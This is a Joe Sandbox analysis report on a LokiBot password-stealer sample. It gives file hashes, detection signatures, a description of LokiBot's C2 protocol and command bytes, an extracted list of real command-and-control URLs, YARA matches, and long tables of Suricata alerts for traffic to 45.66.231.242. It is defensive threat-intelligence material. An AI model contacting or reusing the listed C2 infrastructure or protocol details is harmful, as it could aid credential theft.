Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Odeme_belgesi.exe

Overview

General Information

Sample name:Odeme_belgesi.exe
Analysis ID:1523245
MD5:fc9c0d308e1e66caf355a329f171362a
SHA1:f88d0427a7fab032dcc647f68facf43fcda1857e
SHA256:079f962ef81e19092c633fe2e44d5ebb31eb83c0cb5d1052e1a048e15ba549c8
Tags:exeuser-lowmal3
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Lokibot
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Odeme_belgesi.exe (PID: 6912 cmdline: "C:\Users\user\Desktop\Odeme_belgesi.exe" MD5: FC9C0D308E1E66CAF355A329F171362A)
    • Odeme_belgesi.exe (PID: 7124 cmdline: C:\Users\user\Desktop\Odeme_belgesi.exe MD5: FC9C0D308E1E66CAF355A329F171362A)
    • Odeme_belgesi.exe (PID: 7128 cmdline: C:\Users\user\Desktop\Odeme_belgesi.exe MD5: FC9C0D308E1E66CAF355A329F171362A)
      • WerFault.exe (PID: 4996 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7128 -s 80 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://solutviewmen.viewdns.net/bdifygidj/five/fre.php"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1688230207.00000000029D3000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
      00000000.00000002.1688230207.00000000029D3000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
        00000000.00000002.1688230207.00000000029D3000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000002.1688230207.00000000029D3000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lokibot_1f885282unknownunknown
          • 0x1b2e4:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
          00000000.00000002.1688230207.00000000029D3000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lokibot_0f421617unknownunknown
          • 0x8627:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
          Click to see the 29 entries
          SourceRuleDescriptionAuthorStrings
          0.2.Odeme_belgesi.exe.44788b8.1.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
            0.2.Odeme_belgesi.exe.44788b8.1.unpackWindows_Trojan_Lokibot_1f885282unknownunknown
            • 0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
            0.2.Odeme_belgesi.exe.44788b8.1.unpackWindows_Trojan_Lokibot_0f421617unknownunknown
            • 0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
            0.2.Odeme_belgesi.exe.44788b8.1.unpackLoki_1Loki Payloadkevoreilly
            • 0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
            • 0x133fc:$a2: last_compatible_version
            0.2.Odeme_belgesi.exe.44788b8.1.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
            • 0x123ff:$des3: 68 03 66 00 00
            • 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
            • 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
            Click to see the 24 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-01T10:54:59.840322+020020243121A Network Trojan was detected192.168.2.44973045.66.231.24280TCP
            2024-10-01T10:55:00.929821+020020243121A Network Trojan was detected192.168.2.44973145.66.231.24280TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-01T10:54:59.017244+020020253811Malware Command and Control Activity Detected192.168.2.44973045.66.231.24280TCP
            2024-10-01T10:55:00.012405+020020253811Malware Command and Control Activity Detected192.168.2.44973145.66.231.24280TCP
            2024-10-01T10:55:01.012878+020020253811Malware Command and Control Activity Detected192.168.2.44973245.66.231.24280TCP
            2024-10-01T10:55:01.929584+020020253811Malware Command and Control Activity Detected192.168.2.44973345.66.231.24280TCP
            2024-10-01T10:55:02.838931+020020253811Malware Command and Control Activity Detected192.168.2.44973445.66.231.24280TCP
            2024-10-01T10:55:03.734897+020020253811Malware Command and Control Activity Detected192.168.2.44973545.66.231.24280TCP
            2024-10-01T10:55:04.791909+020020253811Malware Command and Control Activity Detected192.168.2.44973645.66.231.24280TCP
            2024-10-01T10:55:05.714856+020020253811Malware Command and Control Activity Detected192.168.2.44973745.66.231.24280TCP
            2024-10-01T10:55:06.689995+020020253811Malware Command and Control Activity Detected192.168.2.44973845.66.231.24280TCP
            2024-10-01T10:55:10.539446+020020253811Malware Command and Control Activity Detected192.168.2.44973945.66.231.24280TCP
            2024-10-01T10:55:11.431407+020020253811Malware Command and Control Activity Detected192.168.2.44974045.66.231.24280TCP
            2024-10-01T10:55:12.290926+020020253811Malware Command and Control Activity Detected192.168.2.44974145.66.231.24280TCP
            2024-10-01T10:55:13.156783+020020253811Malware Command and Control Activity Detected192.168.2.44974245.66.231.24280TCP
            2024-10-01T10:55:14.059014+020020253811Malware Command and Control Activity Detected192.168.2.44974445.66.231.24280TCP
            2024-10-01T10:55:15.181877+020020253811Malware Command and Control Activity Detected192.168.2.44974745.66.231.24280TCP
            2024-10-01T10:55:16.001641+020020253811Malware Command and Control Activity Detected192.168.2.44974945.66.231.24280TCP
            2024-10-01T10:55:17.057243+020020253811Malware Command and Control Activity Detected192.168.2.44975245.66.231.24280TCP
            2024-10-01T10:55:20.935914+020020253811Malware Command and Control Activity Detected192.168.2.44975345.66.231.24280TCP
            2024-10-01T10:55:21.808725+020020253811Malware Command and Control Activity Detected192.168.2.44975445.66.231.24280TCP
            2024-10-01T10:55:22.700322+020020253811Malware Command and Control Activity Detected192.168.2.44975545.66.231.24280TCP
            2024-10-01T10:55:23.622010+020020253811Malware Command and Control Activity Detected192.168.2.44975645.66.231.24280TCP
            2024-10-01T10:55:24.716379+020020253811Malware Command and Control Activity Detected192.168.2.44975745.66.231.24280TCP
            2024-10-01T10:55:25.534367+020020253811Malware Command and Control Activity Detected192.168.2.44975845.66.231.24280TCP
            2024-10-01T10:55:26.361457+020020253811Malware Command and Control Activity Detected192.168.2.44975945.66.231.24280TCP
            2024-10-01T10:55:27.260785+020020253811Malware Command and Control Activity Detected192.168.2.44976045.66.231.24280TCP
            2024-10-01T10:55:28.111446+020020253811Malware Command and Control Activity Detected192.168.2.44976145.66.231.24280TCP
            2024-10-01T10:55:28.997001+020020253811Malware Command and Control Activity Detected192.168.2.44976245.66.231.24280TCP
            2024-10-01T10:55:29.807741+020020253811Malware Command and Control Activity Detected192.168.2.44976345.66.231.24280TCP
            2024-10-01T10:55:30.730772+020020253811Malware Command and Control Activity Detected192.168.2.44976445.66.231.24280TCP
            2024-10-01T10:55:31.541452+020020253811Malware Command and Control Activity Detected192.168.2.44976545.66.231.24280TCP
            2024-10-01T10:55:32.344919+020020253811Malware Command and Control Activity Detected192.168.2.44976645.66.231.24280TCP
            2024-10-01T10:55:33.286078+020020253811Malware Command and Control Activity Detected192.168.2.44976745.66.231.24280TCP
            2024-10-01T10:55:34.118881+020020253811Malware Command and Control Activity Detected192.168.2.44976845.66.231.24280TCP
            2024-10-01T10:55:34.933166+020020253811Malware Command and Control Activity Detected192.168.2.44976945.66.231.24280TCP
            2024-10-01T10:55:35.839128+020020253811Malware Command and Control Activity Detected192.168.2.44977045.66.231.24280TCP
            2024-10-01T10:55:36.706651+020020253811Malware Command and Control Activity Detected192.168.2.44977145.66.231.24280TCP
            2024-10-01T10:55:37.524416+020020253811Malware Command and Control Activity Detected192.168.2.44977245.66.231.24280TCP
            2024-10-01T10:55:38.374178+020020253811Malware Command and Control Activity Detected192.168.2.44977345.66.231.24280TCP
            2024-10-01T10:55:39.385441+020020253811Malware Command and Control Activity Detected192.168.2.44977445.66.231.24280TCP
            2024-10-01T10:55:40.328121+020020253811Malware Command and Control Activity Detected192.168.2.44977545.66.231.24280TCP
            2024-10-01T10:55:41.381303+020020253811Malware Command and Control Activity Detected192.168.2.44977645.66.231.24280TCP
            2024-10-01T10:55:42.421721+020020253811Malware Command and Control Activity Detected192.168.2.44977745.66.231.24280TCP
            2024-10-01T10:55:43.589678+020020253811Malware Command and Control Activity Detected192.168.2.44977845.66.231.24280TCP
            2024-10-01T10:55:47.464644+020020253811Malware Command and Control Activity Detected192.168.2.44977945.66.231.24280TCP
            2024-10-01T10:55:48.292929+020020253811Malware Command and Control Activity Detected192.168.2.44978045.66.231.24280TCP
            2024-10-01T10:55:49.348506+020020253811Malware Command and Control Activity Detected192.168.2.44978145.66.231.24280TCP
            2024-10-01T10:55:50.343657+020020253811Malware Command and Control Activity Detected192.168.2.44978245.66.231.24280TCP
            2024-10-01T10:55:51.144817+020020253811Malware Command and Control Activity Detected192.168.2.44978345.66.231.24280TCP
            2024-10-01T10:55:52.156456+020020253811Malware Command and Control Activity Detected192.168.2.44978445.66.231.24280TCP
            2024-10-01T10:55:53.192942+020020253811Malware Command and Control Activity Detected192.168.2.44978645.66.231.24280TCP
            2024-10-01T10:55:53.988611+020020253811Malware Command and Control Activity Detected192.168.2.44978745.66.231.24280TCP
            2024-10-01T10:55:54.958720+020020253811Malware Command and Control Activity Detected192.168.2.44978845.66.231.24280TCP
            2024-10-01T10:55:55.793611+020020253811Malware Command and Control Activity Detected192.168.2.44978945.66.231.24280TCP
            2024-10-01T10:55:56.591640+020020253811Malware Command and Control Activity Detected192.168.2.44979045.66.231.24280TCP
            2024-10-01T10:55:57.452108+020020253811Malware Command and Control Activity Detected192.168.2.44979145.66.231.24280TCP
            2024-10-01T10:55:58.764642+020020253811Malware Command and Control Activity Detected192.168.2.44979245.66.231.24280TCP
            2024-10-01T10:55:59.680645+020020253811Malware Command and Control Activity Detected192.168.2.44979345.66.231.24280TCP
            2024-10-01T10:56:00.513321+020020253811Malware Command and Control Activity Detected192.168.2.44979445.66.231.24280TCP
            2024-10-01T10:56:10.439429+020020253811Malware Command and Control Activity Detected192.168.2.44979545.66.231.24280TCP
            2024-10-01T10:56:11.353855+020020253811Malware Command and Control Activity Detected192.168.2.44979645.66.231.24280TCP
            2024-10-01T10:56:12.182284+020020253811Malware Command and Control Activity Detected192.168.2.44979745.66.231.24280TCP
            2024-10-01T10:56:13.048624+020020253811Malware Command and Control Activity Detected192.168.2.44979845.66.231.24280TCP
            2024-10-01T10:56:13.911144+020020253811Malware Command and Control Activity Detected192.168.2.44979945.66.231.24280TCP
            2024-10-01T10:56:14.813722+020020253811Malware Command and Control Activity Detected192.168.2.44980045.66.231.24280TCP
            2024-10-01T10:56:15.707475+020020253811Malware Command and Control Activity Detected192.168.2.44980145.66.231.24280TCP
            2024-10-01T10:56:16.758460+020020253811Malware Command and Control Activity Detected192.168.2.44980245.66.231.24280TCP
            2024-10-01T10:56:17.789425+020020253811Malware Command and Control Activity Detected192.168.2.44980345.66.231.24280TCP
            2024-10-01T10:56:21.729047+020020253811Malware Command and Control Activity Detected192.168.2.44980445.66.231.24280TCP
            2024-10-01T10:56:22.932407+020020253811Malware Command and Control Activity Detected192.168.2.44980545.66.231.24280TCP
            2024-10-01T10:56:23.914707+020020253811Malware Command and Control Activity Detected192.168.2.44980645.66.231.24280TCP
            2024-10-01T10:56:27.790640+020020253811Malware Command and Control Activity Detected192.168.2.44980745.66.231.24280TCP
            2024-10-01T10:56:28.717307+020020253811Malware Command and Control Activity Detected192.168.2.44980845.66.231.24280TCP
            2024-10-01T10:56:29.548372+020020253811Malware Command and Control Activity Detected192.168.2.44980945.66.231.24280TCP
            2024-10-01T10:56:30.403711+020020253811Malware Command and Control Activity Detected192.168.2.44981045.66.231.24280TCP
            2024-10-01T10:56:31.360698+020020253811Malware Command and Control Activity Detected192.168.2.44981145.66.231.24280TCP
            2024-10-01T10:56:32.244487+020020253811Malware Command and Control Activity Detected192.168.2.44981245.66.231.24280TCP
            2024-10-01T10:56:33.078751+020020253811Malware Command and Control Activity Detected192.168.2.44981345.66.231.24280TCP
            2024-10-01T10:56:34.264055+020020253811Malware Command and Control Activity Detected192.168.2.44981445.66.231.24280TCP
            2024-10-01T10:56:35.118822+020020253811Malware Command and Control Activity Detected192.168.2.44981545.66.231.24280TCP
            2024-10-01T10:56:36.007121+020020253811Malware Command and Control Activity Detected192.168.2.44981645.66.231.24280TCP
            2024-10-01T10:56:37.076989+020020253811Malware Command and Control Activity Detected192.168.2.44981745.66.231.24280TCP
            2024-10-01T10:56:37.993838+020020253811Malware Command and Control Activity Detected192.168.2.44981845.66.231.24280TCP
            2024-10-01T10:56:38.817577+020020253811Malware Command and Control Activity Detected192.168.2.44981945.66.231.24280TCP
            2024-10-01T10:56:39.675484+020020253811Malware Command and Control Activity Detected192.168.2.44982045.66.231.24280TCP
            2024-10-01T10:56:40.543640+020020253811Malware Command and Control Activity Detected192.168.2.44982145.66.231.24280TCP
            2024-10-01T10:56:41.469900+020020253811Malware Command and Control Activity Detected192.168.2.44982245.66.231.24280TCP
            2024-10-01T10:56:42.355681+020020253811Malware Command and Control Activity Detected192.168.2.44982345.66.231.24280TCP
            2024-10-01T10:56:43.346923+020020253811Malware Command and Control Activity Detected192.168.2.44982445.66.231.24280TCP
            2024-10-01T10:56:44.250217+020020253811Malware Command and Control Activity Detected192.168.2.44982545.66.231.24280TCP
            2024-10-01T10:56:45.124436+020020253811Malware Command and Control Activity Detected192.168.2.44982645.66.231.24280TCP
            2024-10-01T10:56:46.001925+020020253811Malware Command and Control Activity Detected192.168.2.44982745.66.231.24280TCP
            2024-10-01T10:56:46.932311+020020253811Malware Command and Control Activity Detected192.168.2.44982845.66.231.24280TCP
            2024-10-01T10:56:47.715173+020020253811Malware Command and Control Activity Detected192.168.2.44982945.66.231.24280TCP
            2024-10-01T10:56:48.656357+020020253811Malware Command and Control Activity Detected192.168.2.44983045.66.231.24280TCP
            2024-10-01T10:56:49.497277+020020253811Malware Command and Control Activity Detected192.168.2.44983145.66.231.24280TCP
            2024-10-01T10:56:50.315483+020020253811Malware Command and Control Activity Detected192.168.2.44983245.66.231.24280TCP
            2024-10-01T10:56:51.139744+020020253811Malware Command and Control Activity Detected192.168.2.44983345.66.231.24280TCP
            2024-10-01T10:56:52.030835+020020253811Malware Command and Control Activity Detected192.168.2.44983445.66.231.24280TCP
            2024-10-01T10:56:52.933070+020020253811Malware Command and Control Activity Detected192.168.2.44983545.66.231.24280TCP
            2024-10-01T10:56:53.939406+020020253811Malware Command and Control Activity Detected192.168.2.44983645.66.231.24280TCP
            2024-10-01T10:56:54.751235+020020253811Malware Command and Control Activity Detected192.168.2.44983745.66.231.24280TCP
            2024-10-01T10:56:55.562073+020020253811Malware Command and Control Activity Detected192.168.2.44983845.66.231.24280TCP
            2024-10-01T10:56:56.353977+020020253811Malware Command and Control Activity Detected192.168.2.44983945.66.231.24280TCP
            2024-10-01T10:56:57.296632+020020253811Malware Command and Control Activity Detected192.168.2.44984045.66.231.24280TCP
            2024-10-01T10:56:58.123183+020020253811Malware Command and Control Activity Detected192.168.2.44984145.66.231.24280TCP
            2024-10-01T10:56:59.239027+020020253811Malware Command and Control Activity Detected192.168.2.44984245.66.231.24280TCP
            2024-10-01T10:57:00.235929+020020253811Malware Command and Control Activity Detected192.168.2.44984345.66.231.24280TCP
            2024-10-01T10:57:01.169312+020020253811Malware Command and Control Activity Detected192.168.2.44984445.66.231.24280TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-01T10:54:58.990484+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449797TCP
            2024-10-01T10:55:01.758214+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449732TCP
            2024-10-01T10:55:02.671005+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449733TCP
            2024-10-01T10:55:03.560722+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449734TCP
            2024-10-01T10:55:04.625681+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449735TCP
            2024-10-01T10:55:05.545578+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449736TCP
            2024-10-01T10:55:06.538355+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449737TCP
            2024-10-01T10:55:10.382539+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449738TCP
            2024-10-01T10:55:11.263234+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449739TCP
            2024-10-01T10:55:12.109161+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449740TCP
            2024-10-01T10:55:13.003680+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449741TCP
            2024-10-01T10:55:13.909463+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449742TCP
            2024-10-01T10:55:14.902772+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449744TCP
            2024-10-01T10:55:15.845470+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449747TCP
            2024-10-01T10:55:16.904506+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449749TCP
            2024-10-01T10:55:20.766594+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449752TCP
            2024-10-01T10:55:21.659847+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449753TCP
            2024-10-01T10:55:22.554283+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449754TCP
            2024-10-01T10:55:23.475666+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449755TCP
            2024-10-01T10:55:24.556972+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449756TCP
            2024-10-01T10:55:25.379994+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449757TCP
            2024-10-01T10:55:26.200291+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449758TCP
            2024-10-01T10:55:27.090660+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449759TCP
            2024-10-01T10:55:27.956334+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449760TCP
            2024-10-01T10:55:28.844483+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449761TCP
            2024-10-01T10:55:29.666645+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449762TCP
            2024-10-01T10:55:30.563306+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449763TCP
            2024-10-01T10:55:31.399345+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449764TCP
            2024-10-01T10:55:32.198987+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449765TCP
            2024-10-01T10:55:33.049597+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449766TCP
            2024-10-01T10:55:33.954180+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449767TCP
            2024-10-01T10:55:34.781785+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449768TCP
            2024-10-01T10:55:35.689906+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449769TCP
            2024-10-01T10:55:36.541214+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449770TCP
            2024-10-01T10:55:37.355853+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449771TCP
            2024-10-01T10:55:38.221829+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449772TCP
            2024-10-01T10:55:39.225109+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449773TCP
            2024-10-01T10:55:40.160479+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449774TCP
            2024-10-01T10:55:41.026897+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449775TCP
            2024-10-01T10:55:42.246152+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449776TCP
            2024-10-01T10:55:43.429625+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449777TCP
            2024-10-01T10:55:47.277080+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449778TCP
            2024-10-01T10:55:48.117744+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449779TCP
            2024-10-01T10:55:48.973432+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449780TCP
            2024-10-01T10:55:50.181516+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449781TCP
            2024-10-01T10:55:50.995191+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449782TCP
            2024-10-01T10:55:51.902879+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449783TCP
            2024-10-01T10:55:53.039442+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449784TCP
            2024-10-01T10:55:53.838641+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449786TCP
            2024-10-01T10:55:54.643998+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449787TCP
            2024-10-01T10:55:55.647797+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449788TCP
            2024-10-01T10:55:56.443702+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449789TCP
            2024-10-01T10:55:57.293823+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449790TCP
            2024-10-01T10:55:58.598040+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449791TCP
            2024-10-01T10:55:59.522201+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449792TCP
            2024-10-01T10:56:00.363531+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449793TCP
            2024-10-01T10:56:10.265824+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449794TCP
            2024-10-01T10:56:11.184005+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449795TCP
            2024-10-01T10:56:12.009437+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449796TCP
            2024-10-01T10:56:13.740120+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449798TCP
            2024-10-01T10:56:14.668285+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449799TCP
            2024-10-01T10:56:15.557520+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449800TCP
            2024-10-01T10:56:16.590966+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449801TCP
            2024-10-01T10:56:17.501549+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449802TCP
            2024-10-01T10:56:21.575286+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449803TCP
            2024-10-01T10:56:22.790596+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449804TCP
            2024-10-01T10:56:23.762391+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449805TCP
            2024-10-01T10:56:27.648158+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449806TCP
            2024-10-01T10:56:28.566911+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449807TCP
            2024-10-01T10:56:29.402143+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449808TCP
            2024-10-01T10:56:30.243287+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449809TCP
            2024-10-01T10:56:31.101297+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449810TCP
            2024-10-01T10:56:32.079313+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449811TCP
            2024-10-01T10:56:32.922481+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449812TCP
            2024-10-01T10:56:33.845002+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449813TCP
            2024-10-01T10:56:34.959453+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449814TCP
            2024-10-01T10:56:35.853992+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449815TCP
            2024-10-01T10:56:36.903028+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449816TCP
            2024-10-01T10:56:37.832349+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449817TCP
            2024-10-01T10:56:38.662708+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449818TCP
            2024-10-01T10:56:39.508520+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449819TCP
            2024-10-01T10:56:40.385790+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449820TCP
            2024-10-01T10:56:41.315506+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449821TCP
            2024-10-01T10:56:42.201279+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449822TCP
            2024-10-01T10:56:43.193663+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449823TCP
            2024-10-01T10:56:44.092775+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449824TCP
            2024-10-01T10:56:44.968018+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449825TCP
            2024-10-01T10:56:45.848547+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449826TCP
            2024-10-01T10:56:46.772733+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449827TCP
